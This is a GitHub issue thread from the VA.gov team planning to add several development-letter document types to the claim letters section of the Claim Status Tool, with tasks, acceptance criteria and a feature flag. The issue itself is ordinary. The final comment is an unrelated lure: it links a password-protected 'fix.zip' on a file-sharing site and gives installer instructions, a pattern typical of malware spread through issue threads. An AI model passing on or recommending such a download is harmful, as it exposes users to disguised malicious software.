### ISSUE TITLE
[CST] [ENG] add subsequent development letters to claim letters section of CST.

### ISSUE THREAD

**Issue by jacobworrell** [department-of-veterans-affairs/va.gov-team#91425]
## Value Statement
**_As a_** veteran with a claim in CST
**_I want to_** have access to subsequent development letters
**_So that_** I understand what key evidence I need to submit and also stay informed with key claim developments

---
## Background Context
Currently, we only show Notification Letters and 5103 letters in the claim letters section of CST. 

Current: 

<img width="365" src="https://api.zenhub.com/attachedFiles/eyJfcmFpbHMiOnsibWVzc2FnZSI6IkJBaHBBeEdJQmc9PSIsImV4cCI6bnVsbCwicHVyIjoiYmxvYl9pZCJ9fQ==--a3521501cbb6bc83d7efaee2926295e29700d6e5/present%20claim%20letter%20list%20.png" alt="present claim letter list .png" />

### Bug
- Steps to reproduce
- What is the bug?

### New Feature
- Why are we doing this work?
- Epic Link

## Outcome, Success Measure, KPI(S), and Tracking Link
- Add here

## Design
- Add here

### Enablement team (if needed)
@member of team

## Engineering 
- The letter types that we want to add to the DDL section of CST are: 34, 408, 700, 859, and 942
- We should be able to use the feature flag in vets-api to do most of the work via the ClaimLettersController (app/controllers/v0/claim_letters_controller.rb), specifically the `allowed_doctypes` method

## Out of scope
- Add here

## Open questions
- Add here

## Tasks
- [x] Add doctypes 34, 408, 700, 859, and 942 to the list of possible options to be returned by the `ClaimLettersController`
- [x] Add descriptions for doctypes 34, 408, 700, 859, and 942 to the list of existing descriptions in `ClaimLetterListItem.jsx`
- [x] Update specs in vets-api to ensure that the appropriate documents are being returned based on the value of the `cst_include_ddl_sqd_letters` feature flag

## Definition of Done
- [x] Meets acceptance criteria
- [ ] Passed E2E testing (90% coverage)
- [ ] Passed unit testing (90% coverage)
- [ ] Passed integration testing (if applicable)
- [ ] Code reviewed (internal)
- [ ] Submitted to staging
- [ ] Team approved production verification process
- [ ] Design performs design QA and verifies the implementation matches the design spec
- [ ] Accessibility specialist performs accessibility review (in code or design)
- [ ] Engineering identifies staging users required to test and shares account and credentials with design and product
- [ ] Product performs functional QA and verifies acceptance criteria was met

## Acceptance Criteria
- [x] Documents of type Correspondence (34) are added to claim letters section of CST
- [x] Documents of type VA Examination Letter (408) are added to claim letters section of CST
- [x] Documents of type MAP-D Development letter (700) are added to claim letters section of CST
- [x] Documents of type Subsequent Development letter (859) are added to the claim letters section of CST
- [x] Documents of type Final Attempt Letter (942) are added to the claim letters section of CST
- [x] Documents of type "General Records Request (Medical)" (864) are added to the claim letters section of CST
- [x] Documents of type "General Records Request (Non-Medical)" (1605) are added to the laim letters section of CST
- [x] Documents with ID 34, 700, and 859 get the short display label of "Request for specific evidence or information"
- [x] Documents with ID 408 get short display label of "Notification: Exam with VHA has been scheduled"
- [x] Documents with ID 942 get short display label of "Final notification: Request for specific evidence or information". 
- [x] Documents with ID 864 and 1605 get short display label of "Copy of request for medical records sent to a non-VA provider" 
- [x] This work is gated behind the `cst_include_ddl_sqd_letters` feature flag.

**Comment by pngjian** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
